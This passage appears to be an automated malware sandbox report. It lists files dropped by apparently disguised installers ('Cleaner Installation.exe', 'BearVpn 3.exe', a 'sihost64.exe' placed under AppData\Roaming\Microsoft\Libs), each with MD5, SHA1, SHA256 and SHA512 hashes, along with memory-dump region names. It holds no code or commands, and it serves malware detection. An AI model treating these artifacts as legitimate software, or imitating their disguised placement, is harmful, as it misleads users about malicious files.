SHA1 eba6ac68efa579c97da96494cde7ce063579d168
SHA256 5f6fc7b3ebd510eead2d525eb22f80e08d8aeb607bd4ea2bbe2eb4b5afc92914
SHA512 8806ff483b8a2658c042e289149e7810e2fb6a72fb72adbf39ed10a41dbab3131e8dfdaca4b4dba62ed767e53d57bd26c4d8005ce0b057606662b9b8ebb83171

memory/1464-114-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\lijun-game.exe

MD5 fce1bf8a528a6f3cd7fbfe8c5360bffb
SHA1 1d5a8cba2fe37249f08154f4de532f2b2703fbfd
SHA256 61f6aaf51880570891d51f241af185edfa7ae118b4c4d2ddba4ed12f314db69c
SHA512 a5d559e62289c60348991ff1f8c9663b4e339bf8359bdb2b981824635ee0a475c31c6c5d84d38a9565ec609abe4243d963cccaf435091d1ed55c40498bed990a

C:\Users\Admin\AppData\Local\Temp\is-RVTDF.tmp\setup_2.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/100-89-0x0000000074560000-0x0000000074D10000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe

MD5 3d9122fa1978d737354a61b3b4fc2c1b
SHA1 955f39ab127baa0c5fd23a1724293b52ce48e10e
SHA256 90abe563deabe721caffa1a0297eb3e1ab5fdad2a4e8e0dba26764f169062e1e
SHA512 f4f994ac1b5c2c9634fd3da58a1d993154eb2ed573bbc127466b90996970cf245453a9dd2d6ba642fbfae7bc7b7f2e8ff1671c0b7a638bd1a9afb54fb2b42d7a

C:\Users\Admin\AppData\Local\Temp\is-2S679.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe

MD5 e4ff121d36dff8e94df4e718ecd84aff
SHA1 b84af5dae944bbf34d289d7616d2fef09dab26b7
SHA256 2a019bc6bace686b08286ee7d8e2e66c18283b162d27774c486037c940dc60cc
SHA512 141f12468cfe737b3694a4ece8f17c5d35bbade05ee0538fe4ef4fccf61584374f79a474fd4bf82685a4840afd94e9a9bbd9c9f357cb342dda9f89109c4da5f4

memory/2416-180-0x0000000000400000-0x0000000000414000-memory.dmp

memory/3660-188-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/1464-193-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2220-191-0x00000000003D0000-0x00000000003D8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\decoder.dll

MD5 62326d3ef35667b1533673d2bb1d342c
SHA1 8100ce90b7cbddd7ef2fd77c544ebf12ebd5ec33
SHA256 a087b791ff8ff9e05e339600199aa389a4554050acc7af7fa36dbe208be7382e
SHA512 7321feae8ee8d0653d7bd935e3d2e6f658e6798b2a7a8f44976c58509028e79284582132cb999c7c3124a7e94960d9c5d5fc8edefaeda06275ab725730d0d9b5

memory/100-194-0x0000000074560000-0x0000000074D10000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-UHHMH.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi

MD5 e8814a38767e2058ea73c141708d3944
SHA1 8a5cc50e86e64c724a458ef837a59881cf923534
SHA256 3b948d673f54a39a50d92b2819ab8d1ad2c54f9c1de368b19fca2c8648661e8d
SHA512 b0d7936840db0f8418a31f938144eb1826ebf6ac01ac358c5f6f607ba7267e6c1549ea46ea607dea825a5e83d2eae20304e29e25976cd66d21e87e7f7990f045

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

MD5 971c514f84bba0785f80aa1c23edfd79
SHA1 732acea710a87530c6b08ecdf32a110d254a54c8
SHA256 f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA512 43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

MD5 d925b4bb49f9d7f5eec4d019e8544c43
SHA1 ae76189eb7282615efd3beb2ba5734a442b86c1d
SHA256 16e4a9804f4710830dae47aff6cee32bcaf5ef3f5939836cd92342022e39c7f8
SHA512 3ca194a91bbd7b1eae43a9911bc14fb755c8a7b529cd27df0a85ccc080ec707fad0c2301e7d9148036ac0ba1a5587174f32ccaf33fe8b6eb7572c655d26e3c49

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

MD5 67e486b2f148a3fca863728242b6273e
SHA1 452a84c183d7ea5b7c015b597e94af8eef66d44a
SHA256 facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb
SHA512 d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

MD5 82f5e67edc80fec0525097c116de39ee
SHA1 66aa10099421ed84b49209be291520d73734bb63
SHA256 eac71f2b9b972a78459095d99bad7b1b0f90334379751602a6910befd63fd83b
SHA512 3496d5abac9cc3662173a63c2353e306211fe76034d0cdf53017db53ed22de23740732039994809143547c7e0ca9a5494df9f3c8142dd6183c57d1dd0927bb08

C:\Users\Admin\AppData\Local\Temp\15212437139445115188

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/4348-233-0x0000000000400000-0x0000000000878000-memory.dmp

memory/184-241-0x0000000000400000-0x00000000008D7000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\152124371394

MD5 9e199134256e1f46be499b3c98b8c98c
SHA1 50db981e29608396a31a273e3860b2ec03dd2f85
SHA256 c7fcdefd75d3f4cfc0af506e9d2eaea9f3eae7fa7dedcb88ca0822a610a5482a
SHA512 abad5d7078a1fff0997a0bfa0593aa4d8a96dabc298284a370ac50daee22d58e0d27add6fce545827afd61b1b17a03fce33ffdfe5aa5823f5e3e4dbdde36c66f

C:\Users\Admin\AppData\Local\Temp\RarSFX1\4~T6.Kj6

MD5 ac6ad5d9b99757c3a878f2d275ace198
SHA1 439baa1b33514fb81632aaf44d16a9378c5664fc
SHA256 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512 bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

C:\Users\Admin\AppData\Local\Temp\RarSFX1\mzanA.e

MD5 4048075ba32058b2ffb4d02fd8f88568
SHA1 9d35c34fdadce90fa5e8debce667429b9a126059
SHA256 98f66e3e4a0015b41c8598da139dc3ef4f9a7d5795ec8ebeeee1afa48bef2d6b
SHA512 4670adf32f1d1843e4fead5d78946c46ea1b5eaf3d1967ac87ff474b076d0f2f279ad115b22bb6dbfe72fc4b251f6fc86fa1cc12d5f24048e4801cafbef2eb18

C:\Users\Admin\AppData\Local\Temp\RarSFX1\kdDPilen.~t5

MD5 3a5d1bdea281c18ea044795ada56759b
SHA1 18a7d75b598dbd93baa5e77ce2e57bbbd18c0975
SHA256 436d167234c2913c51685816549be0a32fb5f6b4eb7724797aa211a6b98f1b54
SHA512 3f58d8c995b32f0724fb295c7fdcfed6f884a6d0338193bd29a6fc97d3ac907516dfc04aab0eb41f565db110fcb0a0d4e5a78140860b73fa2ad8696ccdc7ad3f

C:\Users\Admin\AppData\Local\Temp\RarSFX1\oAykH.~~

MD5 da678f3df8a1104ec2ce8c9816b5156c
SHA1 f25f50f2a134270ff5d68fb9334e05e04a499798
SHA256 0f3a327e883e7fd4ec2377e0bf624504fdf91ba8a998d90bcd5d3c0895a26456
SHA512 b040d9211ba1504fd0807c9708a9e925fc33ec2819c2d4aa05462ccc1fc2794fd10d045533b9e4d584147f5c8882cfec0f06213e177b6b932d64fccd30852991

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Z8ISj6._Nm

MD5 dcae4cf1f6df8ecee8a59809270d12df
SHA1 0e4fc026ae3795f14f3f7606bee2cde9ce0726bf
SHA256 caf0ca04e918436343125e04b29443d566ade372504568ee5a883958f67049ec
SHA512 cdea06242802cc4cb1b0ab2c663a7ee07abed801743036201576680eb61ae59da1f624428fed46cbeba9c225ffa4a068290f3fa26f4103abde76f3322c23d8b0

C:\Users\Admin\AppData\Local\Temp\RarSFX1\JJdPql_.2B

MD5 770b27fbf31087cc450783085296dd4b
SHA1 e11b5a284842ee442a18646611eb8d2fe34b3e59
SHA256 4338a7e054ebab8a375330b93e3d99faa0d3bccd53b2c0c5d3cfd560f977c386
SHA512 46b78e590c4634b8d16c9d9f72fd61bae01e35828b204b19a1ae13156dc688be994ac9bf7cdce048c4907eb52c7a9240705fad6c42899fec29ed32eff396bfcd

C:\Users\Admin\AppData\Local\Temp\kZ_AmsXL.6G

MD5 e141dd69d1cf6a3a0bd9c185a0064b49
SHA1 959a997e66acd8410343ed3efed3e5929494b125
SHA256 3a15463ef6c1296aecb36fd653f22938adfe9f9f42c6d5ef24630f22827a70a3
SHA512 efdc55d1c729f08275c5f6cda531baf6db98347b91db377e9f3cddb9399afb0d20bbcadbb103c25d7af48b90409e8bdf77c0065d2285b955a047c66349263999

C:\Users\Admin\AppData\Local\Temp\MSIBC8A.tmp

MD5 07ce413b1af6342187514871dc112c74
SHA1 8008f8bfeae99918b6323a3d1270dea63b3a8394
SHA256 0ba7e90fe2a0005e1e0dad53e2678916650c3b95ff9b666b802d128276c8ec46
SHA512 27df52bfcbc2d0ce3756a2526e632b5610d7047259b31aeeff12652de3e046bcd239e39c222a323654f475f1f913679b4fdd858303e0e105f7a300b6f6ed0fe5

C:\Users\Admin\AppData\Local\Temp\MSIBD85.tmp

MD5 e6a708c70a8cfd78b7c0383615545158
SHA1 b9274d9bf4750f557d34ddfd802113f5dd1df91c
SHA256 e124c00f974e0c09200676e7ce2147c3822b4cd4764dcc970e832bd93d869d0c
SHA512 2d0162f268f357a29c8bc35f855678e8e47e8a70825130e73e40a7dca1e9a3d8844b66616bfaa156b16fa4162bcf6991f659b3a6e8ee3caf841c87ec16189ff8

memory/2332-310-0x0000000003740000-0x00000000037E4000-memory.dmp

memory/2332-317-0x00000000037F0000-0x0000000003882000-memory.dmp

memory/2332-314-0x00000000037F0000-0x0000000003882000-memory.dmp

memory/816-325-0x0000000000B70000-0x0000000000B7C000-memory.dmp

memory/1860-326-0x0000000000400000-0x0000000000877000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_3956\background.jpg_1

MD5 dad3ad4310bc5bac9792e23d6949fcaa
SHA1 6dc7a1f5d6db6ef57dc854929110c9fd40ded9d3
SHA256 9aff9d1d1319aeaeb1ec627f42d2527dd6e54c14125d6c639ec9739b11795db8
SHA512 914deef5ffa1bac71109f81e57ab76b5a1f80d5b6c4b2717302c0d79e8ccc1b09e72a4c397521f7bfa15847aec7ce54038a316512e20637fb1e1c48b387f75d5

memory/2416-373-0x0000000000400000-0x0000000000414000-memory.dmp

memory/3652-372-0x0000000000400000-0x0000000000878000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\MSIDEF3.tmp

MD5 842cc23e74711a7b6955e6876c0641ce
SHA1 3c7f32c373e03d76e9f5d76d2dfdcb6508c7af56
SHA256 7e434d53739356b7f74c5143b98138c6b67b38c2dbd772a28e8dde70e8be8644
SHA512 dd8323f657786fae516b400fe6b0569b8d4d16ccb4b396648b427e875d9e5b1eb7a874338d386f0940dc370de6fecf9893efd28149745bc9fd3f67a792ec824d

memory/1860-387-0x0000000000400000-0x0000000000877000-memory.dmp

memory/2332-394-0x0000000000400000-0x000000000053A000-memory.dmp

memory/3468-393-0x0000000000400000-0x00000000004BD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\MSIF2EB.tmp

MD5 f32ac1d425e8b7c320d6be9a968585ab
SHA1 3b0bd3122226f2ac9f11664d9fc13d699b6dcfa0
SHA256 96f8d286f86055dcb3a15e0f3a2de092b0441ec36455c14caaad4c1f5a227894
SHA512 d8d9d996e279b7500306614448d61d5c3ac9c2efc28ac71d1daa09951f342d2cf773f0a7b51cb847f4d91dd34018e4a2d7977c0f6f2859795d4f0df7ac894b27

C:\Users\Admin\AppData\Local\Temp\shiF85A.tmp

MD5 77d6c08c6448071b47f02b41fa18ed37
SHA1 e7fdb62abdb6d4131c00398f92bc72a3b9b34668
SHA256 047e2df9ccf0ce298508ee7f0db0abcb2ff9cff9916b6e8a1fbd806b7a9d064b
SHA512 e1aeb8e8b441d755a119f45a465ca5660678f4131984322252bfb6d2cec52e7ee54d65a64b98429b23915eb5707b04b5cd62a85446c60de8842314130a926dbd

memory/4524-412-0x00000000015B0000-0x00000000015BE000-memory.dmp

memory/4524-413-0x0000000003610000-0x0000000003622000-memory.dmp

memory/3652-429-0x0000000000400000-0x0000000000878000-memory.dmp

memory/2332-438-0x00000000037F0000-0x0000000003882000-memory.dmp

memory/2332-439-0x0000000003890000-0x0000000004D12000-memory.dmp

memory/2332-440-0x0000000004D20000-0x0000000004DAB000-memory.dmp

memory/2332-446-0x0000000004DB0000-0x0000000004E36000-memory.dmp

memory/3224-450-0x0000000002400000-0x000000000253A000-memory.dmp

memory/3224-460-0x00000000029A0000-0x0000000002A44000-memory.dmp

memory/3224-472-0x0000000002A60000-0x0000000002AF2000-memory.dmp

memory/3224-469-0x0000000002A60000-0x0000000002AF2000-memory.dmp

C:\Config.Msi\e586b1a.rbs

MD5 dbf422b221c18dd503e9a341d3730f2a
SHA1 1df96ac7444b27febd77e1b2d9376ac6196b1e27
SHA256 9eb81bb26e5dd9e854aa050fe3864fd480df1c37aaa97dcce75fd16769467e17
SHA512 3288fa2645db73b838c59f017ae99030a0b87571d4a97ce8ed46721e4c26a81d36082c40ac2705f36ffc43a9c406789481ca8566ef07604437013c751e1337cc

memory/3224-486-0x0000000002400000-0x000000000253A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_3956\background.jpg

MD5 31e2eb815eb3a794b04a2a300f24c3b0
SHA1 ac129cfafe62d2dd77a95ce9cacd5b8e5bf4b4fa
SHA256 7686c3e3e78ba82914789e8e69781299d054a910710f004c774a20b5b123e2c1
SHA512 ffe4ddc06d278d61c7d8d827eb33184310f43fb86b1850a45e5b06ed6562564df33073158b336efd7f9ed417d0a7123d17c3b7f7fc914d06f628d7588f4380fb

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

MD5 339347f8a4bc7137b6a6a485f6cd0688
SHA1 9b198dc642f9f32ea38884d47c1fe7d8868e3f39
SHA256 c6f8eec2d3204bad0712705405fdb09555bf2bc26f83f0cf1d7966b86a46f601
SHA512 04c73aa7cff15895daf42119873df920e2ee9500d1293f470ad590cbd9cccf09f6df206f1aa9fa09e744f404f5365174f570a7f33a9a642453531dcfbaeb26fd

memory/3092-514-0x0000000000620000-0x0000000000626000-memory.dmp

memory/3676-552-0x0000000140000000-0x0000000140786000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\e59a3a9.exe

MD5 99c8a5f7c87b4ec0ac66592a85e129f5
SHA1 3699ef050962cfa6e3d6440a941396c9f022ea52
SHA256 899c95d880933fc5a12f409c8e7821148ef0f9b4a28c226cb9cc6f44caacdbad
SHA512 a3af8e0340d85cc0d83ed0824c98ff1de2aba7d73299ce47ab136df40c44ed34acd5e06d80d22a61b2963bd6c5586d80d446b205aa1e9ddad27b3ba4396b1b18

memory/5036-628-0x0000000000F20000-0x0000000000F28000-memory.dmp